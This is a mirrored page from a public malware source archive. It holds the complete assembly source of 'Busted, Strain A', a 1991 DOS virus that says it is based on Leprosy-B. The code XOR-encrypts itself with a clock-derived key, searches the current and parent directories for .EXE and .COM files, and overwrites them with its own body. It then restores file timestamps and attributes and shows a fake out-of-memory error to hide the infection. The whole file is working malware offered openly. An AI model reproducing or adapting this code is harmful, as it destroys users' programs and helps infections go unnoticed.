mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
226 lines
12 KiB
NASM
226 lines
12 KiB
NASM
|
cr equ 13 ; Carriage return ASCII code
|
|||
|
lf equ 10 ; Linefeed ASCII code
|
|||
|
tab equ 9 ; Tab ASCII code
|
|||
|
code_start equ 100h ; Address right after PSP in memory
|
|||
|
dta equ 80h ; Addr of default disk transfer area
|
|||
|
datestamp equ 24 ; Offset in DTA of file's date stamp
|
|||
|
timestamp equ 22 ; Offset in DTA of file's time stamp
|
|||
|
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
|||
|
attribute equ 21 ; Offset in DTA of file attribute
|
|||
|
|
|||
|
|
|||
|
code segment 'code' ; Open code segment
|
|||
|
assume cs:code,ds:code ; One segment for both code & data
|
|||
|
org code_start ; Start code image after PSP
|
|||
|
|
|||
|
;---------------------------------------------------------------------
|
|||
|
; All executable code is contained in boundaries of procedure "main".
|
|||
|
; The following code, until the start of "virus_code", is the non-
|
|||
|
; encrypted CMT portion of the code to load up the real program.
|
|||
|
;---------------------------------------------------------------------
|
|||
|
main proc near ; Code execution begins here
|
|||
|
call encrypt_decrypt ; Decrypt the real virus code
|
|||
|
jmp random_mutation ; Put the virus into action
|
|||
|
|
|||
|
encrypt_val1 db 00h ; Hold value to encrypt by here
|
|||
|
encrypt_val2 db 00h
|
|||
|
|
|||
|
; ---------- Encrypt, save, and restore the virus code -----------
|
|||
|
infect_file:
|
|||
|
mov cx,handle ; Get the handle
|
|||
|
push cx ; Save it on the stack
|
|||
|
call encrypt_decrypt ; Encrypt most of the code
|
|||
|
pop bx ; Get back the handle
|
|||
|
mov cx,endvir-main ; Total number of bytes to write
|
|||
|
mov dx,code_start ; Buffer where code starts in memory
|
|||
|
mov ah,40h ; DOS write-to-handle service
|
|||
|
int 21h ; Write the virus code into the file
|
|||
|
call encrypt_decrypt ; Restore the code as it was
|
|||
|
ret ; Go back to where you came from
|
|||
|
|
|||
|
; --------------- Encrypt or decrypt the code ----------------
|
|||
|
encrypt_decrypt:
|
|||
|
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
|||
|
xor_loop: ; Start cycle here
|
|||
|
mov al,[bx] ; Get the current byte
|
|||
|
xor al,encrypt_val1 ; Engage/disengage XOR scheme on it
|
|||
|
mov [bx],al ; Put it back where we got it
|
|||
|
inc bx ; Move BX ahead a byte
|
|||
|
cmp bx,offset virus_code+(endvir-main) ; Are we at the end?
|
|||
|
je xor_nd
|
|||
|
mov al,[bx]
|
|||
|
xor al,encrypt_val2
|
|||
|
mov [bx],al
|
|||
|
inc bx
|
|||
|
cmp bx,offset virus_code+(endvir-main)
|
|||
|
jle xor_loop ; If not, do another cycle
|
|||
|
xor_nd:
|
|||
|
ret ; and go back where we came from
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
|
|||
|
; The rest of the code from here on remains encrypted until run-time,
|
|||
|
; using a fundamental XOR technique that changes via CMT.
|
|||
|
;-----------------------------------------------------------------------
|
|||
|
virus_code:
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
; All strings are kept here in the file, and automatically encrypted.
|
|||
|
; Please don't be a lamer and change the strings and say you wrote a virus.
|
|||
|
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
|||
|
; changes, even when the strings stay the same.
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
exe_filespec db "*.EXE",0
|
|||
|
com_filespec db "*.COM",0
|
|||
|
newdir db "..",0
|
|||
|
fake_msg db cr,lf,"Program too big to fit in memory$"
|
|||
|
virus_msg db cr,lf,tab,"Busted!$"
|
|||
|
virus_info db "This is based on Leprosy-B. Thanx PCM2"
|
|||
|
viral_tag db "Busted, Strain A, version 1.0"
|
|||
|
viral_tag_2 db "By <15><><EFBFBD>@&<>$ (Psychogenius), September '91"
|
|||
|
compare_buf db 20 dup (?) ; Buffer to compare files in
|
|||
|
files_found db ?
|
|||
|
files_infected db ?
|
|||
|
orig_time dw ?
|
|||
|
orig_date dw ?
|
|||
|
orig_attr dw ?
|
|||
|
handle dw ?
|
|||
|
success db ?
|
|||
|
|
|||
|
random_mutation: ; First decide if virus is to mutate
|
|||
|
mov ah,2ch ; Set up DOS function to get time
|
|||
|
int 21h
|
|||
|
cmp encrypt_val1,0 ; Is this a first-run virus copy?
|
|||
|
je install_val ; If so, install whatever you get.
|
|||
|
install_val:
|
|||
|
cmp dl,0 ; Will we be encrypting using zero?
|
|||
|
je random_mutation ; If so, get a new value.
|
|||
|
mov encrypt_val1,dl ; Otherwise, save the new value
|
|||
|
mov encrypt_val2,dh
|
|||
|
find_extension: ; Locate file w/ valid extension
|
|||
|
mov files_found,0 ; Count infected files found
|
|||
|
mov files_infected,4 ; BX counts file infected so far
|
|||
|
mov success,0
|
|||
|
find_exe:
|
|||
|
mov cx,00100111b ; Look for all flat file attributes
|
|||
|
mov dx,offset exe_filespec ; Check for .EXE extension first
|
|||
|
mov ah,4eh ; Call DOS find first service
|
|||
|
int 21h
|
|||
|
cmp ax,12h ; Are no files found?
|
|||
|
je find_com ; If not, nothing more to do
|
|||
|
call find_healthy ; Otherwise, try to find healthy .EXE
|
|||
|
find_com:
|
|||
|
mov cx,00100111b ; Look for all flat file attributes
|
|||
|
mov dx,offset com_filespec ; Check for .COM extension now
|
|||
|
mov ah,4eh ; Call DOS find first service
|
|||
|
int 21h
|
|||
|
cmp ax,12h ; Are no files found?
|
|||
|
je chdir ; If not, step back a directory
|
|||
|
call find_healthy ; Otherwise, try to find healthy .COM
|
|||
|
chdir: ; Routine to step back one level
|
|||
|
mov dx,offset newdir ; Load DX with address of pathname
|
|||
|
mov ah,3bh ; Change directory DOS service
|
|||
|
int 21h
|
|||
|
dec files_infected ; This counts as infecting a file
|
|||
|
jnz find_exe ; If we're still rolling, find another
|
|||
|
jmp exit_virus ; Otherwise let's pack it up
|
|||
|
find_healthy:
|
|||
|
mov bx,dta ; Point BX to address of DTA
|
|||
|
mov ax,[bx]+attribute ; Get the current file's attribute
|
|||
|
mov orig_attr,ax ; Save it
|
|||
|
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
|||
|
mov orig_time,ax ; Save it
|
|||
|
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
|||
|
mov orig_date,ax ; Save it
|
|||
|
mov dx,dta+filename ; Get the filename to change attribute
|
|||
|
mov cx,0 ; Clear all attribute bytes
|
|||
|
mov al,1 ; Set attribute sub-function
|
|||
|
mov ah,43h ; Call DOS service to do it
|
|||
|
int 21h
|
|||
|
mov al,2 ; Set up to open handle for read/write
|
|||
|
mov ah,3dh ; Open file handle DOS service
|
|||
|
int 21h
|
|||
|
mov handle,ax ; Save the file handle
|
|||
|
mov bx,ax ; Transfer the handle to BX for read
|
|||
|
mov cx,20 ; Read in the top 20 bytes of file
|
|||
|
mov dx,offset compare_buf ; Use the small buffer up top
|
|||
|
mov ah,3fh ; DOS read-from-handle service
|
|||
|
int 21h
|
|||
|
mov bx,offset compare_buf ; Adjust the encryption value
|
|||
|
mov ah,encrypt_val1 ; for accurate comparison
|
|||
|
mov [bx+6],ah
|
|||
|
mov si,code_start ; One array to compare is this file
|
|||
|
mov di,offset compare_buf ; The other array is the buffer
|
|||
|
mov ax,ds ; Transfer the DS register...
|
|||
|
mov es,ax ; ...to the ES register
|
|||
|
cld
|
|||
|
repe cmpsb ; Compare the buffer to the virus
|
|||
|
jne healthy ; If different, the file is healthy!
|
|||
|
call close_file ; Close it up otherwise
|
|||
|
inc files_found ; Chalk up another fucked up file
|
|||
|
continue_search:
|
|||
|
mov ah,4fh ; Find next DOS function
|
|||
|
int 21h ; Try to find another same type file
|
|||
|
cmp ax,12h ; Are there any more files?
|
|||
|
je no_more_found ; If not, get outta here
|
|||
|
jmp find_healthy ; If so, try the process on this one!
|
|||
|
no_more_found:
|
|||
|
ret ; Go back to where we came from
|
|||
|
healthy:
|
|||
|
mov bx,handle ; Get the file handle
|
|||
|
mov ah,3eh ; Close it for now
|
|||
|
int 21h
|
|||
|
mov ah,3dh ; Open it again, to reset it
|
|||
|
mov dx,dta+filename
|
|||
|
mov al,2
|
|||
|
int 21h
|
|||
|
mov handle,ax ; Save the handle again
|
|||
|
call infect_file ; Infect the healthy file
|
|||
|
call close_file ; Close down this operation
|
|||
|
inc success ; Indicate we did something this time
|
|||
|
dec files_infected ; Scratch off another file on agenda
|
|||
|
jz exit_virus ; If we're through, terminate
|
|||
|
jmp continue_search ; Otherwise, try another
|
|||
|
ret
|
|||
|
close_file:
|
|||
|
mov bx,handle ; Get the file handle off the stack
|
|||
|
mov cx,orig_time ; Get the date stamp
|
|||
|
mov dx,orig_date ; Get the time stamp
|
|||
|
mov al,1 ; Set file date/time sub-service
|
|||
|
mov ah,57h ; Get/Set file date and time service
|
|||
|
int 21h ; Call DOS
|
|||
|
mov bx,handle
|
|||
|
mov ah,3eh ; Close handle DOS service
|
|||
|
int 21h
|
|||
|
mov cx,orig_attr ; Get the file's original attribute
|
|||
|
mov al,1 ; Instruct DOS to put it back there
|
|||
|
mov dx,dta+filename ; Feed it the filename
|
|||
|
mov ah,43h ; Call DOS
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
exit_virus:
|
|||
|
cmp files_found,6 ; Are at least 6 files infected?
|
|||
|
jl print_fake ; If not, keep a low profile
|
|||
|
cmp success,0 ; Did we infect anything?
|
|||
|
jg print_fake ; If so, cover it up
|
|||
|
mov ah,09h ; Use DOS print string service
|
|||
|
MOV DX, OFFSET virus_msg ; Print "Busted!"
|
|||
|
jmp terminate
|
|||
|
print_fake:
|
|||
|
mov ah,09h ; Use DOS to print fake error message
|
|||
|
mov dx,offset fake_msg
|
|||
|
int 21h
|
|||
|
terminate:
|
|||
|
mov ah,4ch ; DOS terminate process function
|
|||
|
int 21h ; Call DOS to get out of this program
|
|||
|
endvir LABEL BYTE
|
|||
|
|
|||
|
main endp
|
|||
|
code ends
|
|||
|
end main
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|